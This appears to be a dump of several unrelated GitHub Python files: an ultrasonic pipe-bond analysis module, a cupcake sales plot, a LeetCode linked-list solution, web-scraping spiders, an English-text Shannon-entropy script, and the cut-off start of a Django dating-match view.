moments(y,x=None,centre='mode'):\n\n from numpy import average,array,linspace,trapz\n from numpy.linalg import norm\n\n if x is None:\n\n x=linspace(0.,len(y)-1,len(y))\n\n m=[]\n\n m.append(trapz(y,x))\n y=y/m[0]\n\n if centre=='mean':\n m.append(trapz(x*y,x))\n elif centre=='mode':\n m.append(x[abs(y).argmax()])\n\n\n m.append(trapz(y*(x-m[1])**2,x))\n m.append(trapz(y*(x-m[1])**3,x)/(m[2]**1.5))\n m.append(trapz(y*(x-m[1])**4,x)/(m[2]**2))\n\n return m\n\n\ndef SimulateEchoes(d,K,dt=0.02,c=[2.05,1.98,2.91,5.9],rho=[0.94,0.94,1.5,7.8],alpha=[0.089,0.092,0.001],f0=6.5,BW=4.,T0=0.5,T=5):\n\n Zb = rho[0]*c[0]\n Za = rho[1]*c[1]\n Zp = rho[2]*c[2]\n Zs = rho[3]*c[3]\n\n Ta = 2*d[0]/c[1]\n Tp = 2*d[1]/c[2]\n Ts = 2*d[2]/c[3]\n\n ba = c[1]*alpha[0]\n bp = c[2]*alpha[1]\n bs = c[3]*alpha[2]\n\n N = FFTLengthPower2(round(T/dt))\n\n f = linspace(0,1/(2*dt),N/2+1)\n\n Rba = (Za-Zb)/(Za+Zb)\n Tba = 4*Za*Zb/(Za+Zb)**2\n\n dR = 2j*pi*(Za*Zp/K)*f\n\n\n\n Rap = (Zp-Za+dR)/(Zp+Za+dR)\n Rpa = (Za-Zp+dR)/(Zp+Za+dR)\n\n Tap = 4*Za*Zp/(Za+Zp+dR)**2\n\n Rps = (Zs-Zp)/(Zs+Zp)\n Tps = 4*Zs*Zp/(Zs+Zp)**2\n\n A = (Tap/Rap)*Rps\n\n f1 = f0-BW/2\n f2 = f0+BW/2\n\n frng=(f>=f1)&(f<=f2)\n\n a = -4*log(0.5)/(BW**2)\n\n X = -exp(-a*(f-f0)**2)*exp(-2j*pi*T0*f)\n\n X = Rba*X/max(abs(X))\n\n Hp = Rap\n\n Hp = Rap+Tap*Rps*exp(-2j*pi*Tp*f)*exp(-bp*Tp*f)+Tap*Rps*Rpa*exp(-4j*pi*Tp*f)*exp(-2*bp*Tp*f)\n\n Hs = -Tap*Tps*exp(-2j*pi*Ts*f)*exp(-bs*Ts*f)*exp(-2j*pi*Tp*f)*exp(-2*bp*Tp*f)*(1 + Rps*Rpa*exp(-2j*pi*Tp*f)*exp(-2*bp*Tp*f))\n\n H = Hp + Hs\n\n Y = X*exp(-2j*pi*Ta*f)*exp(-ba*Ta*f)*H*Tba/Rba\n\n x = ifft(2*X,N)\n\n y = ifft(2*Y,N)\n\n t = linspace(0,dt*(len(y)-1),len(y))\n\n return t,x+y\n\ndef AdhesivePrimerFit(T1,T2,b1,b2,p):\n\n from scipy.linalg import lstsq\n\n\n f = p[0]\n X = p[1]\n Y = p[2]\n # T1 = p[3]\n # T2 = p[4]\n\n # A = exp(-b1*T1*f)*exp(-2j*pi*T1*f)*hstack((ones((len(f),1)),exp(-b2*T2*f)*exp(-2j*pi*T2*f),exp(-4j*pi*T2*f)*exp(-2*b2*T2*f)))\n\n A = hstack((exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X,exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X*exp(-b2*T2*f)*exp(-2j*pi*T2*f),exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X*exp(-4j*pi*T2*f)*exp(-2*b2*T2*f)))\n\n\n v,r,rnk,sval = lstsq(A,Y)\n r = float(r[0])/len(f)\n\n\n return v,r\n\n\n# def AdhesivePrimerFit(a1,a2,p):\n\n# f = p[0]\n# H = p[1]\n# T1 = p[2]\n# T2 = p[3]\n\n# relrtol = 1e-2\n# vtol = 1e-2\n# maxiter = 10\n\n# A = hstack((exp(-a1*T1*f)*exp(-2j*pi*T1*f),exp(-a1*T1*f)*exp(-a2*T2*f)*exp(-2j*pi*T1*f)*exp(-2j*pi*T2*f),H*exp(-2j*pi*T2*f)*exp(-a2*T2*f)))\n\n# v,r,rnk,sval = lstsq(A,H)\n\n# r = float(r)/len(f)\n\n# dv = 1.\n# dr = 1.\n\n# Niter = 0\n\n# while (dr > relrtol) & (dv > vtol) & (Niter < maxiter):\n\n# A = hstack((exp(-a1*T1*f)*exp(-2j*pi*T1*f),exp(-a1*T1*f)*exp(-a2*T2*f)*exp(-2j*pi*T1*f)*exp(-2j*pi*T2*f),H*exp(-2j*pi*T2*f)*exp(-a2*T2*f)))\n\n# W = diag(abs(1/(1-v[2,0]*exp(-2j*pi*T2*f)*exp(-a2*T2*f))**2).flatten())\n\n# vv,rr,rnk,sval = lstsq(dot(W,A),dot(W,H))\n\n# rr = float(rr)/len(f)\n\n# dr = abs((rr-r)/r)\n\n# dv = norm(vv-v)/norm(v)\n\n# v = vv\n\n# r = rr\n\n# Niter = Niter+1\n\n\n# return v,r\n\ndef AdhesivePrimerFitResidual(x,*params):\n\n v,r = AdhesivePrimerFit(x[0],x[1],x[2],x[3],params)\n\n return r\n\ndef ModelReconstruction(v,b1,b2,T1,T2,X,dt,N):\n\n s = linspace(0,1/(2*dt),int(floor(N/2)+1))\n\n # H = exp(-b1*T1*s)*exp(-2j*pi*s*T1)*(v[0,0]+v[1,0]*exp(-2j*pi*T2*s)*exp(-b2*T2*s)+v[2,0]*exp(-4j*pi*T2*s)*exp(-2*b2*T2*s))\n\n # # H = exp(-2j*pi*s*T1)*exp(-b1*T1*s)*(v[0,0]+v[1,0]*exp(-2j*pi*T2*s)*exp(-b2*T2*s))/(1-v[2,0]*exp(-b2*T2*s)*exp(-2j*pi*T2*s))\n\n\n # Y = H*X\n\n Y = exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*v[0,0]+v[1,0]*exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*exp(-2j*pi*T2*s)*exp(-b2*T2*s)+v[2,0]*exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*exp(-4j*pi*T2*s)*exp(-2*b2*T2*s)\n\n y = ifft(2*Y,N)\n\n return y,Y\n\n\ndef AdhesivePrimerFeatures(x,dt,frng,df=0.01,fprng=[2,10],d=[[1,2.5],[0.1,0.5]],c=[1.98,2.91],beta=[[0.14,0.22],[0.09,0.45]],exptype='immersion'):\n\n from scipy.optimize import brute\n\n from numpy.fft import fft\n\n if exptype=='immersion':\n\n gates=[(0.5,1.5,0.4,0.01),(1.75,4.25,3,0.01)]\n\n elif exptype=='contact':\n\n gates=[(0.,1.,0.4,0.01),(1.7,4.25,3,0.01)]\n\n\n F = []\n Hx = []\n\n\n\n NFFT = FFTLengthPower2(round(1/(df*dt)))\n\n for xx in x:\n\n try:\n\n if exptype=='immersion':\n\n xc = xx[abs(xx).argmax()::]\n\n elif exptype=='contact':\n\n xc = xx\n\n\n ig1= (int(gates[0][0]/dt),int(gates[0][1]/dt))\n ig2 = (int(gates[1][0]/dt),int(gates[1][1]/dt))\n\n iw = int(gates[0][2]/dt)\n\n im1 = abs(xc[ig1[0]:ig1[1]]).argmax()+ig1[0]\n im2 = abs(xc[ig2[0]:ig2[1]]).argmax()+ig2[0]\n\n il1,ir1 = (im1-iw,im1+iw)\n il2,ir2 = (im2-iw*gates[1][2],im2+iw*gates[1][2])\n\n b1 = mean(array(beta[0]))\n b2 = mean(array(beta[1]))\n\n\n T = dt*(im2-im1)\n\n\n x1 = xc[il1:ir1]\n x1 = detrend(x1)\n x1 = x1*tukey(len(x1),gates[0][3])\n\n x2 = xc[il2:ir2]\n x2 =detrend(x2)\n x2 = x2*tukey(len(x2),gates[1][3])\n\n\n im1 = abs(x1).argmax()\n im2 = abs(x2).argmax()\n\n\n X1 = rfft(x1,n=NFFT)\n X2 = rfft(hstack((zeros(il2-il1),x2)),n=NFFT)\n\n\n f = linspace(0.,1/(2*dt),NFFT/2+1)\n\n\n ff = (f>=frng[0])&(f<=frng[1])\n\n fphase = (f>=fprng[0])&(f<=fprng[1])\n\n fp = f[fphase]\n\n f = f[ff]\n\n df = f[1]-f[0]\n\n X1 = -X1\n\n H = X2/X1\n\n Hp = H[fphase]*exp(2j*pi*T*fp)\n\n phi = unwrap(angle(Hp))\n\n H = H[ff]\n\n G = log(abs(Hp))\n\n G1,G0 = polyfit(fp,G,1)\n\n A = exp(G0)\n\n dphi = detrend(savgol_filter(phi,3,2,deriv=1)*(1/df))\n\n\n indmin = localmin(detrend(imag(Hp)))\n\n indmax = localmax(detrend(imag(Hp)))\n\n ind = hstack((indmin,indmax))\n\n ind.sort()\n\n T2a = 1/(2*(mean(diff(ind))*df))\n\n indmin = localmin(dphi)\n\n indmin = indmin[argmin(dphi[indmin])]\n\n\n T2b = 1/(2*fp[indmin])\n\n T2 = array([T2b,3*T2b,5*T2b])\n\n T2 = T2[argmin(abs(T2-T2a))]\n\n print(T2)\n\n\n xx2 = ifft(2*X2,NFFT)\n\n\n T1 = [T-T2,T]\n\n # T1 = T-T2\n\n print(T1)\n\n X1 = X1[ff]\n X2 = X2[ff]\n\n param = (f.reshape((len(f),1)),X1.reshape((len(X1),1)),X2.reshape((len(X2),1)))\n\n\n\n RT = []\n\n for i in range(len(T1)):\n\n # param = (f.reshape((len(f),1)),H.reshape((len(H),1)),T1[i],T2)\n\n v,r = AdhesivePrimerFit(T1[i],T2,b1,b2,param)\n\n RT.append(r)\n\n iTmin = argmin(array(RT))\n\n T1 = T1[iTmin]\n\n # ranges = ((beta[0][0],beta[0][1]),(beta[1][0],beta[1][1]))\n\n # param = (f.reshape((len(f),1)),H.reshape((len(H),1)),T1,T2)\n\n # X1 = X1[ff]\n # X2 = X2[ff]\n\n # param = (f.reshape((len(f),1)),X1.reshape((len(X1),1)),X2.reshape((len(X2),1)))\n\n\n # R = brute(AdhesivePrimerFitPhaseResidual,ranges,param,Ns=10,finish=False)\n\n # R = minimize(AdhesivePrimerFitResidual,[b1,b2],args=param,bounds=[(beta[0][0],beta[0][1]),(beta[1][0],beta[1][1])],method='SLSQP')\n\n R = minimize(AdhesivePrimerFitResidual,[T1,T2,b1,b2],args=param,method='SLSQP')\n\n\n T1 = float(R.x[0])\n T2 = float(R.x[1])\n b1 = float(R.x[2])\n b2 = float(R.x[3])\n\n print(T1)\n print(T2)\n\n\n v,r = AdhesivePrimerFit(T1,T2,b1,b2,param)\n\n B0 = v[0,0]/v[1,0]\n B1 = v[2,0]/v[1,0]\n\n # x2m,X2m,Hm = ModelReconstruction(v,b1,b2,T1,T2,X1,dt,NFFT)\n\n x2m,X2m = ModelReconstruction(v,b1,b2,T1,T2,X1,dt,NFFT)\n\n\n # Hx.append([H,Hm[ff],xx2,x2m])\n\n Hx.append([X2,X2m,xx2,x2m])\n\n\n F.append([T1,T2,b1,b2,abs(B0),angle(B0),abs(B1),angle(B1)])\n\n except:\n\n pass\n\n Nfail = len(x) - len(F)\n\n return F,Nfail,Hx\n\n\n\n\nclass Pipe:\n\n def __init__(self,PipeId=None,BondStrength=[]):\n\n self.PipeId = PipeId\n self.BondStrength = BondStrength\n self.Signals = []\n self.Locations = []\n self.SteelThickness = []\n\n\n def ZeroMean(self):\n\n\n s=self.Signals.copy()\n\n for i in range(len(s)):\n\n self.Signals[i]=s[i]-mean(s[i])\n\n\n\n def LocationIndices(self,Locations):\n\n from numpy import array,tile\n from numpy.linalg import norm\n from copy import deepcopy\n\n L=array(deepcopy(self.Locations))\n NL=L.shape[0]\n\n ind=[]\n\n for l in Locations:\n ind.append(norm(L-tile(array(l),(NL, 1)),1).argmin())\n\n return ind\n\n def ReturnSignals(self,Locations):\n\n from copy import deepcopy\n\n x=array(deepcopy(self.Signals))\n\n ind=self.LocationIndices(Locations)\n\n return list(x[ind,:])\n\n\n def DeleteSignals(self,Locations):\n\n from numpy import array,delete\n\n ind=self.LocationIndices(Locations)\n\n x=list(delete(array(self.Signals),ind,0))\n l=list(delete(array(self.Locations),ind,0))\n self.Locations=l\n self.Signals=x\n\n\n def AddSignal(self,Signal,Location,WriteMode='Append',SamplingPeriod=None):\n\n if WriteMode is 'Append':\n\n (self.Signals).append(Signal)\n (self.Locations).append(Location)\n\n elif WriteMode is 'Overwrite':\n\n self.Signals=Signal\n self.Locations=Location\n\n if SamplingPeriod is not None:\n\n self.SamplingPeriod = SamplingPeriod\n\n\n def Export(self,Filename,Path):\n\n\n if Filename.split('.')[-1] == 'txt':\n\n from numpy import hstack,array,savetxt\n\n # Export Raw Data to a structured text file (comma delimited)\n data=hstack((array(self.Locations),array(self.Signals)))\n\n savetxt(Path+Filename,data,delimiter=',',header=str(self.PipeId)+','+str(self.BondStrength[0])+','+str(self.BondStrength[1])+','+str(self.SamplingPeriod))\n\n elif Filename.split('.')[-1] == 'p':\n\n from pickle import dump\n\n data={'PipeId':self.PipeId,'BondStrength':self.BondStrength,'Locations':self.Locations,'Signals':self.Signals,'SamplingPeriod':self.SamplingPeriod,'SteelThickness':self.SteelThickness}\n\n dump(data,open(Path+Filename,'wb'))\n\n def Load(self, File, Path):\n\n if File.split('.')[1] == 'txt':\n from numpy import loadtxt\n File = Path + File\n data = loadtxt(File,delimiter=',')\n\n self.Signals=list(data[:,2::])\n self.Locations=list(data[:,0:2])\n\n with open(File,'r') as f:\n\n header=f.readline()\n\n header=header[2::].split(',')\n\n self.PipeId = int(header[0])\n self.BondStrength = [float(header[1]),float(header[2])]\n self.SamplingPeriod = float(header[3].rstrip())\n\n elif File.split('.')[1] == 'p':\n\n from pickle import load\n\n pipe = load(open(Path + File,'rb'))\n\n if type(pipe) is dict:\n\n self.PipeId = pipe['PipeId']\n self.BondStrength = pipe['BondStrength']\n self.Signals = pipe['Signals']\n self.Locations = pipe['Locations']\n self.SamplingPeriod = pipe['SamplingPeriod']\n self.SteelThickness = pipe['SteelThickness']\n\n\nclass PipeSet:\n\n def __init__(self,Path):\n\n self.Path=Path\n self.Pipes = []\n\n\n def AddPipesByStrength(self,StrengthRanges):\n\n from os import listdir\n\n files=[f for f in listdir(self.Path) if f.endswith('.p')]\n\n for f in files:\n\n p=Pipe()\n p.Load(f,Path=self.Path)\n\n if any(abs(sum(array(StrengthRanges)-array(p.BondStrength),1))<1e-16):\n\n p.ZeroMean()\n self.Pipes.append(p)\n\n def AddPipesById(self,IdList=None):\n\n from os import listdir\n\n files=[f for f in listdir(self.Path) if f.endswith('.p')]\n\n if IdList==None:\n\n for f in files:\n\n p=Pipe()\n p.Load(f,Path=self.Path)\n\n self.Pipes.append(p)\n\n else:\n\n for f in files:\n\n p=Pipe()\n p.Load(f,Path=self.Path)\n\n if p.PipeId in IdList:\n\n self.Pipes.append(p)\n\n\n def ExtractFeatures(self,ContactType,FrequencyRange,ScansPerPipe=None,rand=False):\n\n from random import sample\n\n for p in self.Pipes:\n\n if ScansPerPipe==None:\n\n NScans=len(p.Signals)\n\n else:\n\n NScans=ScansPerPipe\n\n if rand:\n\n ind = sample(range(len(p.Signals)),ScansPerPipe)\n\n else:\n\n ind=range(NScans)\n\n signals = [p.Signals[i] for i in ind]\n\n F,Nfail,R = AdhesivePrimerFeatures(signals,p.SamplingPeriod,frng=FrequencyRange,exptype=ContactType)\n\n p.Features=array(F)\n p.NFailed=Nfail\n p.Reconstructions=R\n\n\n\n def MakeTrainingSet(self,StrengthRanges,Scale='standard'):\n\n ''' StrengthRanges list of lists defining the Bond Strength Ranges defining each class '''\n\n from sklearn import preprocessing\n from numpy import zeros\n\n X=zeros((1,4))\n y=zeros(1)\n\n for p in self.Pipes:\n\n bs=mean(p.BondStrength)\n\n for i in range(len(StrengthRanges)):\n\n if StrengthRanges[i][0]<=bs<=StrengthRanges[i][1]:\n\n\n X=vstack((X,p.Features))\n y=hstack((y,i*ones(shape(p.Features)[0])))\n\n y=y[1::]\n\n self.y=y.astype(int)\n\n X=X[1::,:]\n\n if Scale=='standard':\n\n ss = preprocessing.StandardScaler()\n\n self.FeatureScaling = ss.fit(X)\n\n X = ss.transform(X)\n\n elif Scale=='robust':\n\n ss = preprocessing.RobustScaler()\n\n self.FeatureScaling = ss.fit(X)\n\n X = ss.transform(X)\n\n self.X=X\n\n def FitRBFClassifier(self,C_range=logspace(-3,3,4),gamma_range=logspace(-3,3,4),niter=10):\n\n from sklearn.cross_validation import StratifiedShuffleSplit\n from sklearn.grid_search import GridSearchCV\n from sklearn import svm\n\n param_grid = dict(gamma=gamma_range, C=C_range)\n cv = StratifiedShuffleSplit(self.y, n_iter=niter, test_size=1/niter, random_state=42)\n grid = GridSearchCV(svm.SVC(), param_grid=param_grid, cv=cv)\n grid.fit(self.X, self.y)\n\n self.RBFClassifier = svm.SVC(C=grid.best_params_['C'],gamma=grid.best_params_['gamma'])\n self.RBFClassifier.fit(self.X,self.y)\n self.RBFScore = self.RBFClassifier.score(self.X,self.y)\n self.MaxDistance = max(self.RBFClassifier.decision_function(self.X))\n self.MinDistance = min(self.RBFClassifier.decision_function(self.X))\n\n self.RBFClassifierCVScore = grid.best_score_\n\n def FitLinearClassifier(self,C_range=logspace(-3,3,4),niter=10):\n\n from sklearn.cross_validation import StratifiedShuffleSplit\n from sklearn.grid_search import GridSearchCV\n from sklearn import svm\n\n\n param_grid = dict(C=C_range)\n cv = StratifiedShuffleSplit(self.y, n_iter=niter, test_size=1/niter, random_state=42)\n grid = GridSearchCV(svm.SVC(kernel='linear'), param_grid=param_grid, cv=cv)\n grid.fit(self.X, self.y)\n\n self.LinearClassifier = svm.SVC(kernel='linear',C=grid.best_params_['C'])\n self.LinearClassifierCVScore = grid.best_score_\n","repo_name":"lesagejonathan/pythoncode","sub_path":"ShawCor.py","file_name":"ShawCor.py","file_ext":"py","file_size_in_byte":16506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42376784230","text":"cupcake=open(\"CupcakeInvoices.csv\")\n# for row in cupcake:\n# print(row)\n\n# for row in cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# for item in spliced:\n# if item== \"Strawberry\":\n# print(item)\n# if item == \"Chocolate\":\n# print(item)\n# if item == \"Vanilla\":\n# print(item)\n\n# for row in cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# total=int(spliced[3])*float(spliced[4])\n# print(total)\n# total=0\n# for row in cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# total+=int(spliced[3])*float(spliced[4])\n# print(total)\n\n# print(round(total, 2))\n\nfrom bokeh.plotting import figure, show\n\nx = []\ny = []\n\na=[]\nb=[]\n\nc=[]\nd=[]\n\nnum=0\nnum1=0\nnum2=0\nfor row in cupcake:\n spliced=row.rstrip(\"\\n\").split(\",\")\n for item in spliced:\n print(item)\n if item == \"Strawberry\":\n x.append(num)\n y.append(int(spliced[3])*float(spliced[4]))\n num+=1\n if item == \"Chocolate\":\n a.append(num1)\n b.append(int(spliced[3])*float(spliced[4]))\n num1+=1\n if item == \"Vanilla\":\n c.append(num2)\n d.append(int(spliced[3])*float(spliced[4]))\n num2+=1\n\n\n# prepare some data\n\n\n# create a new plot with a title and axis labels\np = figure(title=\"Cupcakes\", x_axis_label=\"invoice\", y_axis_label=\"profit\")\n\n# add a line renderer with legend and line thickness\np.line(x, y, legend_label=\"strawberry\", line_width=3, line_color=\"pink\")\np.line(a,b, legend_label=\"chocolate\", line_width=3, line_color=\"brown\")\np.line(c,d, legend_label=\"vanilla\", line_width=3, line_color=\"blue\")\n# show the results\nshow(p)\n\ncupcake.close()","repo_name":"smith-megan/data-python","sub_path":"data_presenter.py","file_name":"data_presenter.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31207360935","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nimport heapq\n\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if not lists:\n return\n \n pq = self.getPQ(lists)\n return self.buildLinkedList(pq)\n \n def buildLinkedList(self, pq: List[int]) -> Optional[ListNode]:\n head = ListNode(0)\n tmp = head\n while pq:\n tmp.next = ListNode(heapq.heappop(pq))\n tmp = tmp.next\n return head.next\n \n def getPQ(self, lists: List[Optional[ListNode]]) -> List[int]:\n pq = []\n for node in lists:\n tmp = node\n while tmp:\n heapq.heappush(pq, tmp.val)\n tmp = tmp.next\n return pq\n \n","repo_name":"albertopha/ds-algo","sub_path":"LC/23/23-py3.py","file_name":"23-py3.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"3968321410","text":"\"\"\"\nDescription\n\"\"\"\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\n\n\nclass Spider(scrapy.Spider):\n name = \"pie\"\n start_urls = ['https://jobs.smartrecruiters.com/WernerEnterprises/743999661236574-dedicated-safety-representative']\n\n def parse(self, response):\n print(\">>>>>\", response.css(\"[itemprop='title']\").extract())\n\nif __name__ == \"__main__\":\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n\n process.crawl(Spider)\n process.start()\n","repo_name":"itallmakesense/ETL-Example","sub_path":"pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22614174763","text":"import scrapy\nfrom ..items import ElectricbargainstoresItem\nimport requests\nimport os\nimport mimetypes\n\n\nclass StoreScraperSpider(scrapy.Spider):\n name = 'store_scraper'\n allowed_domains = ['www.electricbargainstores.com']\n start_urls = ['https://www.electricbargainstores.com/brands-s/3361.htm']\n\n def parse(self, response):\n\n sub_links = response.xpath('//*[@class=\"subcategory_link\"]/@href').extract()\n for link in sub_links:\n yield response.follow(link, self.parseSubCategory)\n\n def parseSubCategory(self, response):\n sub_links = response.xpath('//*[@class=\"subcategory_link\"]/@href').extract()\n if sub_links:\n for link in sub_links:\n yield response.follow(link, self.parseSubCategory)\n else:\n\n product_links = response.xpath('//*[@class=\"v-product__title productnamecolor colors_productname\"]/@href').extract()\n if product_links:\n cat = response.url.rsplit('/', 1)[1]\n cat = cat.rsplit('.', 1)[0]\n yield response.follow(response.url + '?&cat='+cat+'&show=300')\n product_links = response.xpath('//*[@class=\"v-product__title productnamecolor colors_productname\"]/@href').extract()\n for product_link in product_links:\n yield response.follow(product_link, self.parseProduct)\n \n\n def parseProduct(self, response):\n product = ElectricbargainstoresItem()\n product['Name'] = response.xpath('//title/text()').extract_first()\n product['ProductCode'] = response.xpath('//*[@class=\"product_code\"]/text()').extract_first()\n product['Price'] = '$'+response.xpath('//*[@itemprop=\"price\"]/text()').extract_first()\n desc = response.xpath('//*[@id=\"ProductDetail_ProductDetails_div2\"]//tr/descendant::*/text()').extract()\n descrip = \"\"\n for l in desc:\n descrip = descrip + \" \" + l.strip()\n product['TechSpecs'] = descrip.strip().replace('\\n',' ')\n photo_links = response.xpath('//*[@id=\"altviews\"]/a/@href').extract()\n if photo_links:\n for j in range(len(photo_links)):\n if photo_links[j][1]=='/':\n photo_links[j] = \"http://\"+photo_links[j][2:]\n if photo_links[j][1]=='v':\n photo_links[j]= 'https://www.electricbargainstores.com'+photo_links[j]\n\n else:\n photo_links= response.xpath('//*[@property=\"og:image\"]/@content').extract()\n for j in range(len(photo_links)):\n if photo_links[j][1]=='/':\n photo_links[j] = \"http://\"+photo_links[j][2:]\n if photo_links[j][1]=='v':\n photo_links[j]= 'https://www.electricbargainstores.com'+photo_links[j]\n \n product['ProductPhoto'] = photo_links \n pdf_links = response.xpath('//*[(@id = \"ProductDetail_TechSpecs_div\")]//a/@href').extract()\n for j in range(len(pdf_links)):\n if pdf_links[j][1]=='/':\n pdf_links[j] = \"http://www.\"+pdf_links[j][2:]\n if pdf_links[j][1]=='v':\n pdf_links[j]= 'https://www.electricbargainstores.com'+pdf_links[j]\n \n\n product['PDFlink'] = pdf_links\n dl_links = product['ProductPhoto'] + product['PDFlink']\n paths = []\n # use your own path for output folder\n dir = r'C:\\Users\\karti\\Desktop\\projects\\electricbargainstores\\electricbargainstores\\output'\n os.chdir(dir)\n dir = product['ProductCode']\n os.mkdir(dir)\n os.chdir(os.getcwd() +'\\\\'+dir)\n i=1\n for lnk in dl_links:\n\n r = requests.get(lnk,allow_redirects=True)\n content_type = r.headers['content-type']\n ext = mimetypes.guess_extension(content_type)\n fname = product['ProductCode'] + '-'+ str(i) + ext\n open(fname, 'wb').write(r.content)\n paths.append('output/'+ product['ProductCode']+'/'+fname)\n i=i+1\n\n \n \n \n product['PhotoPath'] = paths[:len(product['ProductPhoto'])]\n product['PDFPath'] = paths[len(product['ProductPhoto']):]\n product['Link'] = response.url\n yield product\n","repo_name":"kartikay10/electricbargainstorescraper","sub_path":"electricbargainstores/spiders/store_scraper.py","file_name":"store_scraper.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18199559186","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 02:58:22 2022\n\n@author: renee\n\"\"\"\nimport re\nimport math\nfrom prettytable import PrettyTable\nimport numpy\n#import random\n#import time\n\nentropy_0 = []\n\nfor i in range(1, 46):\n print(i)\n path = '/Users/renee/Documents/Eng/' + str(i) + '.txt'\n with open(path) as data:\n datacontext = data.read()\n data.close()\n with open(\"/Users/renee/Documents/Eng/d2.txt\", 'a') as data_1:\n data_1.write(datacontext)\n data_1.close()\n with open(\"/Users/renee/Documents/Eng/d2.txt\", 'r', encoding='UTF-8') as f:\n content = f.read()\n\n # print('预处理前的字符串:')\n #print(content)\n # Str =content#引入数据\n content = content.replace(\"Please go to\", '')\n content = content.replace(\"install our App to read the latest chapters for free\", '')\n content = content.replace(\"Previous Chapter\", '')\n content = content.replace(\"Next Chapter\", '')\n content = content.replace(\"E.3.3.\", '')\n content = content.replace(\"Chapter\", '')\n a = re.findall(r'[^\\*\"/:?|,!-.%‘—;()’“”‘’。°【0123–456789】<>\\[\\]]', content, re.S) #\n a1 = \"\".join(a) # 去掉特殊字符\n b = a1.lower() # 大写变小写\n c = ' '.join(b.split()) # 去连续的空格\n '''fh = open('/Users/renee/Documents/'+title+'Res.txt', 'w', encoding='utf-8')#写操作\n fh.write(c)\n fh.close()\n\n with open('/Users/renee/Documents/'+title+'Res.txt','r',encoding='UTF-8') as f: # 遍历\n content1 = f.read()'''\n Str1 = c\n # print('预处理后的字符串:')\n # print(Str1)\n sum_1 = 0\n Hx = 0\n k = 0\n j = 0\n s = 0\n Hx = []\n for a1 in Str1:\n if a1 in 'abcdefghijklmnopqrstuvwxyz ':\n sum_1 += 1\n print(f'\"字符总数为\":{sum_1}个')\n # strfloat=numpy.empty(27,dtype=float)\n # strArr=numpy.empty(27,dtype=str)\n resoult = {} # 定义一个空字典\n for i in 'abcdefghijklmnopqrstuvwxyz ': # 遍历输入的字符串,以键值对的方式存储在字典中\n resoult[i] = Str1.count(i)\n # print(type(Str1.count))\n for key in resoult: # 遍历字典,格式化输出结果\n Hx.append((resoult[key] / sum_1) * math.log((sum_1 / resoult[key]), 2)) # 信\n print(Hx)\n Hx_1 =round(sum(Hx),5)\n print(Hx_1)\n entropy_0.append(Hx_1)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(2, 92, 45)\nplt.title('Change of Shannon Entropy for English texts')\nplt.xlabel('File Size(M)')\nplt.ylabel('Shannon Entropy(Bits/letter)')\nplt.plot(x, entropy_0, color='purple'\n )\n","repo_name":"ReneeD1120/NLP_Shannon_Entropy","sub_path":"code/Shannon_entropy_Eng.py","file_name":"Shannon_entropy_Eng.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4432682654","text":"from django.shortcuts import render, redirect\nfrom ..conversations.models import Conversation\nfrom ..new_users.models import User, Profile, Preference\n\n# Create your views here.\ndef index(request, page_num):\n logged_in_user = User.objects.get(id=request.session['logged_in_user'])\n logged_in_profile = Profile.objects.get(user=logged_in_user)\n logged_in_preference = Preference.objects.get(user=logged_in_user)\n\n\n # Getting thet start and end values for the query\n # start = (int(page_num) - 1) * 10\n # end = int(page_num) * 10\n\n # Excluding the same gender as the person logged on and from start to end\n # possible_matches = Profile.objects.exclude(sex=logged_in_profile.sex)[start:end]\n possible_matches = Profile.objects.exclude(sex=logged_in_profile.sex)\n \n matches = []\n\n for person in possible_matches:\n score = 50.0\n\n # Age matches what they want\n if person.age < logged_in_preference.age_max and person.age > logged_in_preference.age_min:\n score += 12.5\n \n # Age does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.age_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n\n\n # Height in feet matches what they want\n if person.height_feet < logged_in_preference.height_feet_max and person.height_feet > logged_in_preference.height_feet_min:\n score += 12.5\n\n # Check is their height in feet is equal to the min height they want and see if with inches they are still taller\n elif person.height_feet == logged_in_preference.height_feet_min and person.height_inch >= logged_in_preference.height_inch_min:\n score += 12.5\n\n # Check is their height in feet is equal to the max height they want and see if with inches they are still shorter\n elif person.height_feet == logged_in_preference.height_feet_max and person.height_inch <= logged_in_preference.height_inch_max:\n score += 12.5\n\n # If they are outside of the range\n else:\n if logged_in_preference.height_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n\n # Body type matches what they want\n if person.body_type == logged_in_preference.body_type:\n score += 12.5\n\n # Body type does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.body_deal_breaker:\n score -= 25\n else:\n score -12.5\n\n\n\n # Salary range matches what they want\n if person.salary_range == logged_in_preference.salary_range:\n score += 